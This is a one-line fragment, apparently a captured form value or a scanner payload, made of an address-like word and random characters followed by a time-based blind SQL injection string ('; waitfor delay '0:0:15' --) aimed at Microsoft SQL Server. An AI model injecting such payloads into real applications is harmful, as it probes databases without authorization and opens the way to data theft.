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Street9QW2AMjI'; waitfor delay '0:0:15' -- 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